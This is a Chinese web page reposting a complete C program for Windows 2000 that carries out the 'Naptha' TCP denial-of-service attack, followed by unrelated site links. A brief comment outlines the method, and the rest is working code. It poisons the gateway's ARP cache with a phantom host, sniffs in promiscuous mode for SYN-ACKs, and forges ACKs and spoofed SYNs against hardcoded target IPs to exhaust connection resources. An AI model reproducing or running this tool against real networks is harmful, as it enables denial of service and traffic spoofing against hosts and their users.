分享
 
 
 

NAPTHA攻击方式在2K下的简单实现

王朝other·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

NAPTHA攻击方式在2K下的简单实现

/*

作者:LionD8

EMAIL:liond8@eyou.com

出处:https://www.xfocus.net/bbs/index.php?act=SE&f=3&t=33339&p=117598

我的窝:http://liond8.126.com

2004.2.16

凌晨

简单原理:

1.欺骗网关,让网关知道幻影主机的MAC.

2.嗅探局域网中的所有数据包,判断是不是返回给虚幻主机的

第2次握手的数据包。如果是,就伪造第3次握手.

3.发送伪造的SYN报文.

通过消耗对方的维护连接的资源进行DOS。占用通道等。

详细原理请见Warning3老大整理的

《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》

我就不废话了。

地址: http://www.nsfocus.net/index.php?act=magazine&do=view&mid=721

*/

///////////////////////////////////////////////////

//以下代码在2K

VC6.0下编译通过

//在虚拟机上测试,好像2k系统如《新型网络DoS(拒绝服务)攻击漏洞 -

"Naptha"》

//所说,不受什么影响.

///////////////////////////////////////////////////

#include

"stdio.h"

#include "Packet32.h"

#include "windows.h"

#include

<ws2tcpip.h>

#include "winsock2.h"

#include

"wchar.h"

#define EPT_IP 0x0800

#define EPT_ARP 0x0806

#define ARP_HARDWARE 0x0001

#define ARP_REQUEST 0x0001

#define ARP_REPLY 0x0002

#define

NDIS_PACKET_TYPE_PROMISCUOUS 0x0020 //混杂模式

#pragma comment(lib,

"packet.lib")

#pragma comment(lib, "ws2_32.lib")

#pragma pack(push,

1)

typedef struct ehhdr

{

UCHAR eh_dst[6];

UCHAR eh_src[6];

USHORT eh_type;

}EHHEADR,

*PEHHEADR;

typedef struct arphdr

{

USHORT arp_hrd;

USHORT arp_pro;

UCHAR arp_hln;

UCHAR arp_pln;

USHORT arp_op;

UCHAR arp_sha[6];

ULONG arp_spa;

UCHAR

arp_tha[6];

ULONG arp_tpa;

}ARPHEADR,

*PARPHEADR;

typedef struct

arpPacket

{

EHHEADR ehhdr;

ARPHEADR arphdr;

}

ARPPACKET, *PARPPACKET;

#pragma pack(pop)

typedef struct

ip_head

{

unsigned char h_verlen;

unsigned char

tos;

unsigned short total_len;

unsigned short

ident;

unsigned short frag_and_flags;

unsigned char ttl;

unsigned char proto;

unsigned short checksum;

unsigned int

sourceIP;

unsigned int destIP;

}IPHEADER;

typedef

struct tcp_head

{

USHORT th_sport;

USHORT th_dport;

unsigned int th_seq;

unsigned int th_ack;

unsigned

char th_lenres;

unsigned char th_flag;

USHORT

th_win;

USHORT th_sum;

USHORT th_urp;

}TCPHEADER;

typedef struct tsd_hdr

{

unsigned long saddr;

unsigned long daddr;

char mbz;

char ptcl;

unsigned short

tcpl;

}PSDHEADER;

DWORD WINAPI ThreadArpSnoop(LPVOID

lp);

USHORT checksum(USHORT *buffer, int

size);

DWORD WINAPI ThreadSynFlood(LPVOID

lp);

DWORD WINAPI SnifferSynAck(LPVOID lp);

void SendAck (

DWORD SEQ , DWORD ACK

,USHORT SPort);

void AnalyseData (LPPACKET

lpPacket);

#define ATPORT 80 //攻击端口

#define ATIP "192.168.1.1" //攻击IP

#define GATE "192.168.85.1" //网关

#define SNOOPIP "192.168.85.250" //幻影主机IP

#define SLEEPTIME 1000

UCHAR DMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFF};

//广播

UCHAR SMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFE};

//幻影主机MAC

BOOL IsGoOn = TRUE;

void main()

{

IsGoOn

=

FALSE;

CreateThread(NULL,NULL,ThreadArpSnoop,NULL,NULL,NULL);

while

( !IsGoOn )

Sleep(1);

IsGoOn =

FALSE;

CreateThread(NULL,NULL,SnifferSynAck,NULL,NULL,NULL);

while

( !IsGoOn

)

Sleep(1);

CreateThread(NULL,NULL,ThreadSynFlood,NULL,NULL,NULL);

while

(1)

Sleep(1000000);

}

DWORD WINAPI ThreadArpSnoop(LPVOID

lp)

{

static CHAR AdapterList[10][1024];

TCHAR

szPacketBuf[512];

LPADAPTER lpAdapter;

LPPACKET

lpPacket;

WCHAR AdapterName[2048];

WCHAR *temp,*temp1;

ARPPACKET ARPPacket;

ULONG

AdapterLength = 1024;

DWORD AdapterNum = 0;

DWORD

nRetCode, i;

if(PacketGetAdapterNames((char*)AdapterName,

&AdapterLength) == FALSE)

{

printf("Unable to retrieve the

list of the adapters!\n");

return 0;

}

temp =

AdapterName;

temp1=AdapterName;

i = 0;

while ((*temp !=

'\0')||(*(temp-1) != '\0'))

{

if (*temp ==

'\0')

{

memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));

temp1=temp+1;

i++;

}

temp++;

}

AdapterNum

= i;

for (i = 0; i < AdapterNum; i++)

wprintf(L"\n%d- %s\n",

i+1, AdapterList[i]);

printf("\nPlease select adapter

number:");

scanf("%d",&i);

if(i>AdapterNum)

{

printf("\nInput

Number error!");

return 0;

}

IsGoOn =

TRUE;

lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR)

AdapterList[i-1]);

if (!lpAdapter || (lpAdapter->hFile ==

INVALID_HANDLE_VALUE))

{

nRetCode =

GetLastError();

printf("Unable to open the driver, Error Code :

%lx\n", nRetCode);

return 0;

}

lpPacket =

PacketAllocatePacket();

if(lpPacket ==

NULL)

{

printf("\nError:failed to allocate the LPPACKET

structure.");

return 0;

}

memset(szPacketBuf, 0,

sizeof(szPacketBuf));

memcpy(ARPPacket.ehhdr.eh_dst, DMacAddr,

6);

memcpy(ARPPacket.ehhdr.eh_src, SMacAddr, 6);

ARPPacket.ehhdr.eh_type =

htons(EPT_ARP);

ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);

ARPPacket.arphdr.arp_pro =

htons(EPT_IP);

ARPPacket.arphdr.arp_hln =

6;

ARPPacket.arphdr.arp_pln =

4;

ARPPacket.arphdr.arp_op =

htons(1);

memcpy(ARPPacket.arphdr.arp_sha, SMacAddr,

6);

ARPPacket.arphdr.arp_spa =

inet_addr(SNOOPIP);

memset(ARPPacket.arphdr.arp_tha,0,6);

ARPPacket.arphdr.arp_tpa

= inet_addr(GATE);

memcpy(szPacketBuf, (char*)&ARPPacket,

sizeof(ARPPacket));

PacketInitPacket(lpPacket, szPacketBuf,

60);

if(PacketSetNumWrites(lpAdapter,

1)==FALSE)

{

printf("warning: Unable to send more than one

packet in a single write!\n");

}

while ( 1

)

{

if(PacketSendPacket(lpAdapter, lpPacket,

TRUE)==FALSE)

{

printf("Error sending the

packets!\n");

return

0;

}

Sleep(30000);

}

PacketFreePacket(lpPacket);

PacketCloseAdapter(lpAdapter);

return

0;

}

DWORD WINAPI ThreadSynFlood(LPVOID lp)

{

WSADATA

WSAData;

SOCKET sock;

SOCKADDR_IN addr_in;

IPHEADER

ipHeader;

TCPHEADER tcpHeader;

PSDHEADER psdHeader;

int

SourcePort;

char szSendBuf[60]={0};

BOOL flag;

int

rect,nTimeOver;

if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)

{

printf("WSAStartup Error!\n");

return

0;

}

sock=NULL;

if

((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)

{

printf("Socket

Setup Error!\n");

return 0;

}

flag=true;

if

(setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char

*)&flag,sizeof(flag))==SOCKET_ERROR)

{

printf("setsockopt IP_HDRINCL error!\n");

return false;

}

nTimeOver=1000;

if (setsockopt(sock, SOL_SOCKET,

SO_SNDTIMEO, (char*)&nTimeOver,

sizeof(nTimeOver))==SOCKET_ERROR) //设置发送的时间

{

printf("setsockopt SO_SNDTIMEO error!\n");

return false;

}

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(ATPORT);

addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);

ipHeader.h_verlen=(4<<4

| sizeof(ipHeader)/sizeof(unsigned

long));

ipHeader.tos=0;

ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));

//IP总长度

ipHeader.ident=1;

ipHeader.frag_and_flags=0;

ipHeader.ttl=123;

ipHeader.proto=IPPROTO_TCP;

ipHeader.checksum=0;

ipHeader.destIP=inet_addr(ATIP);

tcpHeader.th_dport=htons(ATPORT);

tcpHeader.th_ack=0;

tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);

tcpHeader.th_flag=2;

tcpHeader.th_win=htons(512);

tcpHeader.th_urp=0;

tcpHeader.th_seq=htonl(0x12345678);

psdHeader.daddr=ipHeader.destIP;

psdHeader.mbz=0;

psdHeader.ptcl=IPPROTO_TCP;

psdHeader.tcpl=htons(sizeof(tcpHeader));

ipHeader.sourceIP=inet_addr(SNOOPIP);

while(TRUE)

{

SourcePort=GetTickCount()%65534;

tcpHeader.th_sport=htons(SourcePort);

tcpHeader.th_sum=0;

psdHeader.saddr=ipHeader.sourceIP;

memcpy(szSendBuf,

&psdHeader, sizeof(psdHeader));

memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader,

sizeof(tcpHeader));

tcpHeader.th_sum=checksum((USHORT

*)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));

memcpy(szSendBuf, &ipHeader,

sizeof(ipHeader));

memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader,

sizeof(tcpHeader));

rect=sendto(sock, szSendBuf,

sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in,

sizeof(addr_in));

if (rect==SOCKET_ERROR)

{

printf("send

error!:%x\n",WSAGetLastError());

return

false;

}

else printf("send

ok!\n");

Sleep(SLEEPTIME);

}//endwhile

closesocket(sock);

WSACleanup();

return

0;

}

USHORT checksum(USHORT *buffer, int size)

{

unsigned

long cksum=0;

while(size >1)

{

cksum+=*buffer++;

size -=sizeof(USHORT);

}

if(size)

{

cksum += *(UCHAR*)buffer;

}

cksum = (cksum >> 16) + (cksum & 0xffff);

cksum +=

(cksum >>16);

return

(USHORT)(~cksum);

}

DWORD WINAPI SnifferSynAck(LPVOID

lp)

{

LPADAPTER lpAdapter;

static CHAR

AdapterList[10][1024];

ULONG AdapterNum;

WCHAR

AdapterName[2048];

WCHAR

*temp,*temp1;

ULONG AdapterLength=1024;

ULONG i,adapter_num=0;

if(PacketGetAdapterNames((char*)AdapterName,

&AdapterLength) == FALSE)

{

printf("Unable to retrieve the

list of the adapters!\n");

return 0;

}

temp =

AdapterName;

temp1=AdapterName;

i = 0;

while ((*temp !=

'\0')||(*(temp-1) != '\0'))

{

if (*temp ==

'\0')

{

memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));

temp1=temp+1;

i++;

}

temp++;

}

AdapterNum

= i;

for (i = 0; i < AdapterNum; i++)

wprintf(L"\n%d- %s\n",

i+1, AdapterList[i]);

printf("\nPlease select adapter

number:");

scanf("%d",&i);

if(i>AdapterNum)

{

printf("\nInput

Number error!");

return 0;

}

IsGoOn =

TRUE;

lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[i-1]);

if

(!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))

{

printf("Unable

to open the driver, Error Code : %lx\n", GetLastError());

return

0;

}

//设置网卡为混杂模式

if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)

{

printf("Warning:

Unable to set the adapter to promiscuous

mode\n");

}

if(PacketSetBuff(lpAdapter,1024*10)==FALSE)

{

printf("PacketSetBuff

Error: %d\n",GetLastError());

return -1;

}

while (

1 )

{

TCHAR Buffer[1024*10]={0};

LPPACKET

lpPacket;

lpPacket=PacketAllocatePacket();

PacketInitPacket(lpPacket,Buffer,sizeof(Buffer));

PacketReceivePacket(lpAdapter,lpPacket,TRUE);

AnalyseData(

lpPacket );

PacketFreePacket(lpPacket);

}

return

0;

}

void AnalyseData (LPPACKET lpPacket)

{

char

*Buf;

EHHEADR *lpEthdr;

bpf_hdr *lpBpfhdr;

Buf=(char

*)lpPacket->Buffer;

lpBpfhdr=(bpf_hdr *)Buf;

lpEthdr=(EHHEADR

*)(Buf+lpBpfhdr->bh_hdrlen);

if(lpEthdr->eh_type==htons(0x0800)

&& (!memcmp(lpEthdr->eh_dst,SMacAddr,6))

)

{

TCPHEADER *lpTcphdr;

lpTcphdr=(TCPHEADER

*)(Buf+lpBpfhdr->bh_hdrlen+sizeof(EHHEADR)+sizeof(IPHEADER));

if

( lpTcphdr->th_ack == ntohl(0x12345678+1) && lpTcphdr->th_flag ==

0x12)

{

SendAck(lpTcphdr->th_seq,lpTcphdr->th_ack,lpTcphdr->th_dport);

}

}

}

void SendAck

( DWORD SEQ , DWORD ACK ,USHORT SPort)

{

SOCKET sock;

SOCKADDR_IN addr_in;

IPHEADER ipHeader;

TCPHEADER

tcpHeader;

PSDHEADER psdHeader;

char

szSendBuf[60]={0};

BOOL flag;

int

rect,nTimeOver;

sock=NULL;

if

((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)

{

printf("Socket

Setup Error!\n");

return ;

}

flag=true;

if

(setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char

*)&flag,sizeof(flag))==SOCKET_ERROR)

{

printf("setsockopt IP_HDRINCL error!\n");

return ;

}

nTimeOver=1000;

if (setsockopt(sock, SOL_SOCKET,

SO_SNDTIMEO, (char*)&nTimeOver,

sizeof(nTimeOver))==SOCKET_ERROR) //设置发送的时间

{

printf("setsockopt SO_SNDTIMEO error!\n");

return ;

}

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(ATPORT);

addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);

ipHeader.h_verlen=(4<<4

| sizeof(ipHeader)/sizeof(unsigned

long));

ipHeader.tos=0;

ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));

//IP总长度

ipHeader.ident=1;

ipHeader.frag_and_flags=0;

ipHeader.ttl=123;

ipHeader.proto=IPPROTO_TCP;

ipHeader.checksum=0;

ipHeader.destIP=inet_addr(ATIP);

tcpHeader.th_dport=htons(ATPORT);

tcpHeader.th_ack=htonl((ntohl(SEQ)+1));

tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);

tcpHeader.th_flag=0x10;

// ack

tcpHeader.th_win=htons(512);

tcpHeader.th_urp=0;

tcpHeader.th_seq=ACK;

psdHeader.daddr=ipHeader.destIP;

psdHeader.mbz=0;

psdHeader.ptcl=IPPROTO_TCP;

psdHeader.tcpl=htons(sizeof(tcpHeader));

ipHeader.sourceIP=inet_addr(SNOOPIP);

tcpHeader.th_sport=SPort;

tcpHeader.th_sum=0;

psdHeader.saddr=ipHeader.sourceIP;

memcpy(szSendBuf,

&psdHeader, sizeof(psdHeader));

memcpy(szSendBuf+sizeof(psdHeader),

&tcpHeader, sizeof(tcpHeader));

tcpHeader.th_sum=checksum((USHORT

*)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));

memcpy(szSendBuf,

&ipHeader, sizeof(ipHeader));

memcpy(szSendBuf+sizeof(ipHeader),

&tcpHeader, sizeof(tcpHeader));

rect=sendto(sock, szSendBuf,

sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in,

sizeof(addr_in));

if (rect==SOCKET_ERROR)

{

printf("send error!:%x\n",WSAGetLastError());

return

;

}

else printf("send

ok!\n");

closesocket(sock);

}

//参考文献: 《新型网络DoS(拒绝服务)攻击漏洞 -

"Naptha"》

http://www.nsfocus.net/index.php?act=magazine&do=view&mid=721

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有